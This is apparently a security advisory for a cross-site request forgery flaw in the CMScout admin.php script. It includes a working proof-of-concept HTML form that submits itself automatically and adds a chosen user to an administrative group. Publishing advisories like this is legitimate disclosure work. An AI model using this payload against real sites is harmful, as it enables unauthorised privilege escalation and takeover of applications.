XSRF/CSRF in CMScout
The vulnerability exists due to failure in the "admin.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/admin.php?page=users&subpage=usergroups&subpage=usergroups&action=add&uid=USER_ID" method="post" name="main" ><input type="hidden" name="gid" value="1"><input type="hidden" name="utype" value="2"><input type="hidden" name="action" value="Add"></form><script>document.main.submit();</script>